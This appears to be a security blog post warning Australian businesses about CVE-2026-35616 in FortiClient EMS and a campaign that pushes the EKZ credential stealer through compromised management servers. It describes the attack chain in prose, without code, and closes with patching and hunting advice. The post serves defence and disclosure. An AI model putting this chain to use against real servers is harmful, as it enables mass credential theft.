CVE-2026-35616: Attackers Are Using FortiClient EMS to Push Credential-Stealing Malware Across Australian Business Networks

Attackers are actively exploiting a critical flaw in Fortinet's FortiClient Endpoint Management Server (EMS) to silently deliver credential-stealing malware to every device the server manages. The vulnerability — tracked as CVE-2026-35616 with a CVSS score of 9.1 — allows an unauthenticated attacker to hijack the management server, modify its configuration, and push malicious updates disguised as legitimate Fortinet patches to managed endpoints. The Australian Cyber Security Centre (ACSC) has issued guidance for Australian organisations; if your business uses FortiClient EMS, this requires immediate action.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

The CVE-2026-35616 Campaign: What Researchers Found

Threat intelligence researchers at Arctic Wolf published a detailed account in May 2026 of a threat cluster actively exploiting CVE-2026-35616 in FortiClient EMS deployments. The attackers compromised EMS servers — the centralised management consoles that organisations use to provision endpoint security and VPN access across their workforce — and used them as a distribution channel for a previously undocumented credential stealer dubbed EKZ Infostealer.

The vulnerability was first exploited in the wild as a zero-day on 31 March 2026, according to evidence from security honeypots. Fortinet confirmed active exploitation in early April and released emergency hotfixes for the affected versions (7.4.5 and 7.4.6). The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-35616 to its Known Exploited Vulnerabilities (KEV) catalogue on 6 April 2026, ordering federal agencies to apply the fixes within three days — a strong indicator of the flaw's severity and exploitability in the hands of active threat actors.

The Shadowserver Foundation reported approximately 2,000 internet-exposed FortiClient EMS instances at the time of disclosure. Despite the emergency hotfixes and the CISA directive, exploitation continued through May 2026. Security researchers at Bleeping Computer and The Hacker News documented fresh attack activity deploying the EKZ payload, with the campaign specifically targeting organisations that had not yet patched or applied the hotfix.

The Australian Signals Directorate's ACSC has specifically advised Australian organisations to review their networks for vulnerable versions, apply patches as soon as practicable, and monitor for suspicious activity. The ACSC advisory notes that activity was observed in May 2026 and the vulnerability remains under active exploitation.

CVE-2026-35616 was discovered independently by Simo Kohonen of Defused Cyber and Nguyen Duc Anh. It carries a CVSS 3.1 base score of 9.1 (Critical) and is officially classified under CWE-284 (Improper Access Control). The Fortinet PSIRT advisory tracking this issue is FG-IR-26-099.

Why This Is a Supply-Chain-Style Threat to Australian Businesses

What makes CVE-2026-35616 particularly concerning is not merely the vulnerability itself, but the position that FortiClient EMS occupies in an organisation's network. FortiClient EMS is the management hub — the server that tells every managed endpoint what security policies to apply, what software to run, and what VPN settings to use. Compromise it, and you compromise everything downstream.

This is effectively a supply-chain-style attack path, except the compromised component is your own security infrastructure. When attackers modify EMS configuration and VPN policies on a vulnerable server, every endpoint that checks in — laptops, desktops, remote workers' machines — becomes a potential malware delivery target without any further exploitation step required.

For Australian small and medium businesses, the risk is compounded by the sector's heavy reliance on managed service providers (MSPs). Many Australian SMBs outsource their IT security to MSPs, and some of those MSPs use FortiClient EMS to manage hundreds of client endpoints from a single console. A single compromised MSP instance can propagate malicious payloads across dozens of separate businesses within minutes of an endpoint checking in.

The ACSC advisory does not name specific affected industries, but confirms that products managed by MSPs have been among those impacted. If your business has an MSP relationship and that provider uses Fortinet's endpoint management stack, asking directly whether their FortiClient EMS is fully patched and free of unauthorised configuration changes is a reasonable and necessary question.

Beyond the supply-chain risk, credential theft has immediate and compounding consequences. EKZ Infostealer specifically targets saved passwords, session tokens, and payment autofill data stored in browsers. Stolen session cookies bypass multi-factor authentication entirely by replaying the authenticated session rather than re-authenticating. Stolen saved passwords open the door to business email compromise, banking portal access, and cloud service hijacking. For a small business operator in Australia, these are not abstract risks — they are the documented precursors to financial fraud and notifiable data breaches under the Privacy Act 1988.

Inside the Attack: From API Bypass to Silent Credential Extraction

The Vulnerability — Unauthenticated API Access

CVE-2026-35616 is an improper access control vulnerability (CWE-284) present in FortiClient EMS versions 7.4.5 and 7.4.6. It allows an unauthenticated remote attacker to bypass API authentication entirely and send privileged API requests to the server — granting the same level of access as a legitimate administrator without supplying any credentials.

This class of flaw is especially dangerous in endpoint management software because API access equates to administrative control: the ability to read, modify, and push configuration changes to every managed endpoint simultaneously. In normal operation, only authorised administrators should reach this API. The missing access control check means any internet-connected attacker who can reach the server on its management port can bypass that requirement.

The Delivery Mechanism — Weaponising FortiClient's Update Process

Once an attacker has API access, the documented attack chain from Arctic Wolf's research works as follows:

1. The attacker modifies EMS configuration and VPN policies on the compromised server.
2. When an endpoint device establishes a routine IPsec VPN tunnel — a normal, trusted event from the endpoint's perspective — the legitimate Fortinet process fortitray.exe is directed to execute malicious batch scripts injected into the policy.
3. These batch scripts execute a base64-encoded PowerShell payload.
4. The PowerShell payload downloads a file disguised as a standard Fortinet patch update and executes it silently.

The masquerade as a vendor patch is deliberate. Users and security monitoring tools are less likely to flag a file named to resemble a Fortinet update, particularly on machines that are already managed by Fortinet's own tooling. The malicious payload arrives through the same trusted channel that delivers legitimate updates.

The Payload — EKZ Infostealer Capabilities

The EKZ Infostealer is a purpose-built credential harvesting tool with capabilities that target the browser stores most commonly in use across Australian workplaces:

• Google Chrome: EKZ implements bypass techniques targeting Chrome's App-Bound encryption, a protection mechanism introduced specifically to resist credential theft from outside the browser process. That EKZ can circumvent this indicates active, current development by its authors — this is not an off-the-shelf tool repurposed from older campaigns.
• Mozilla Firefox: Credential extraction from Firefox's encrypted credential storage.
• Autofill data: Credit card numbers, billing addresses, and phone numbers stored in browser autofill profiles — the same data used to make online purchases and to answer identity verification questions.
• Session cookies: Authentication tokens that keep users logged in to web services. Stolen session cookies can be replayed to impersonate a victim without requiring their password or any second authentication factor.

All harvested data is exfiltrated to a threat-actor-controlled Virtual Private Server (VPS). The full infection and exfiltration chain can complete in seconds from the moment an endpoint checks in with the compromised EMS server.

What to Do Now: A Prioritised Checklist for Australian Businesses

If your organisation runs FortiClient EMS on-premises, work through the following steps in order:

1. Update to FortiClient EMS 7.4.7 or later immediately.
Fortinet has released version 7.4.7, which fully remediates CVE-2026-35616. Versions 7.4.5 and 7.4.6 are the confirmed affected versions. Updating is the single most important action and should be treated as emergency patching regardless of your normal change-management schedule.

2. Apply the emergency hotfix if an immediate full update is not possible.
Fortinet released emergency hotfixes specifically for versions 7.4.5 and 7.4.6 within days of confirming exploitation. These are available via the Fortinet PSIRT advisory FG-IR-26-099. Apply the hotfix now and schedule the full version update for the earliest available maintenance window.

3. Hunt for indicators of compromise before assuming you are clean.
Arctic Wolf's research on CVE-2026-35616 includes indicators of compromise (IOCs) covering file hashes, PowerShell signatures, and known exfiltration infrastructure used by the EKZ campaign. Review your EMS server logs for: unauthorised modifications to VPN policies; unexpected entries in the software deployment or endpoint configuration queue; and outbound connections from managed endpoints to unfamiliar VPS addresses, particularly shortly after VPN tunnel establishment.

4. Restrict EMS management interface access.
The Shadowserver Foundation found approximately 2,000 internet-exposed EMS instances. If your EMS server's management interface is accessible from the public internet rather than restricted to your internal network or a dedicated management network, this is a secondary but urgent remediation step. Firewall rules or access control lists should limit access to known administrator IP addresses or an internal management VLAN.

5. If you use an MSP, ask directly.
Contact your managed service provider and ask specifically: are you running FortiClient EMS, and if so, what version? Have you reviewed your EMS logs for CVE-2026-35616 indicators? What is your patching SLA for critical vulnerabilities on management infrastructure? A provider that cannot answer these questions clearly warrants a follow-up conversation about their security posture.

6. Reset credentials if compromise is suspected.
If you have any reason to believe your endpoints may have been reached by the EKZ campaign — particularly if they were managed by an EMS server running an affected version during March–May 2026 — assume browser-stored credentials have been harvested and reset passwords for email accounts, cloud services, banking portals, and any system accessible from affected devices. Notify your financial institution if credit card autofill data was present in browsers on affected machines.

Note: FortiClient Cloud (the SaaS-hosted version of EMS) is not affected by CVE-2026-35616 and requires no action. The vulnerability is specific to on-premises deployments.

The ACSC can be contacted on 1300 CYBER1 (1300 292 371) for incident assistance. The ACSC alerts and advisories page provides the most current guidance for Australian organisations.

Fortinet Products Under Fire — and What Australian Businesses Should Learn

CVE-2026-35616 is not an isolated incident for Fortinet, nor is it an isolated pattern across the security industry. Over the past two years, Fortinet products have been a consistent focus for advanced threat actors:

• CVE-2024-21762 (FortiGate SSL-VPN): A critical remote code execution flaw exploited by state-sponsored actors before patches were widely applied.
• CVE-2024-47575 (FortiManager): A zero-day that was exploited before Fortinet publicly disclosed it, affecting the centralised network management system.
• CVE-2026-35616 (FortiClient EMS): This campaign, completing a pattern of attackers progressively targeting every layer of Fortinet's management stack.

The pattern is deliberate. Attackers focus on network management, endpoint management, and VPN gateway products because these systems occupy privileged positions in organisational networks. Once compromised, they provide a trusted, high-bandwidth channel to reach every other device without triggering the alarms that would fire if an attacker attempted to compromise endpoints one by one from the outside.

For Australian businesses and IT managers, this pattern points to several hardening priorities that apply regardless of which vendor's products you use:

Limit management interface exposure. No management console — FortiClient EMS, cPanel, GitLab, or any other centralised administration tool — should be reachable directly from the public internet. Many of the critical vulnerabilities affecting Australian businesses in 2026 were only exploitable because management interfaces were internet-facing. Place management consoles behind a separate access control network or dedicated administration channel, and audit your firewall rules accordingly.

Apply ACSC Essential Eight patch management timelines. The Essential Eight's patch management guidance recommends remediating critical vulnerabilities within 48 hours on internet-facing services. CVE-2026-35616 had a hotfix available within days of Fortinet confirming exploitation — organisations that applied patches within the 48-hour window were substantially protected before the major EKZ campaign reached its peak in May 2026. The 48-hour standard is not theoretical; this campaign demonstrates it is operationally meaningful.

Treat browser-stored credentials as a liability. The EKZ infostealer — like Vidar, RedLine, and other credential stealers that have featured in recent ACSC advisories — specifically targets browser-saved passwords because they represent low-effort, high-yield collection. Browser credential stores were designed for convenience, not for security under an active, targeted attack. Training staff not to save passwords to browsers, and instead using a dedicated encrypted credential store, materially reduces the blast radius when an endpoint is compromised — whether via FortiClient EMS, a phishing email, or any other initial access vector.

Audit managed device estates regularly. Whether you manage your own endpoints or rely on an MSP, periodically confirming that management infrastructure is on a current, patched version is as important as patching the endpoints themselves. A vulnerability in the management plane can render endpoint patching irrelevant.

The ACSC alerts and advisories page is the most reliable first-notification channel for Australian organisations. Subscribing to ACSC alerts via cyber.gov.au/about-us/register means guidance arrives before general media coverage reaches broad audiences — the difference can be the margin between patching before exploitation and responding to a confirmed breach.

Related reading

• ClickFix Vidar Stealer: ACSC Warns Australian Businesses of WordPress Infostealer Campaign
• 16 Billion Passwords Leaked: What Australians Must Do Right Now

The views expressed in this article are editorial opinion and general information only. They do not constitute professional security, legal, or financial advice. Always verify details with primary sources and consult a qualified professional before making security decisions based on this content.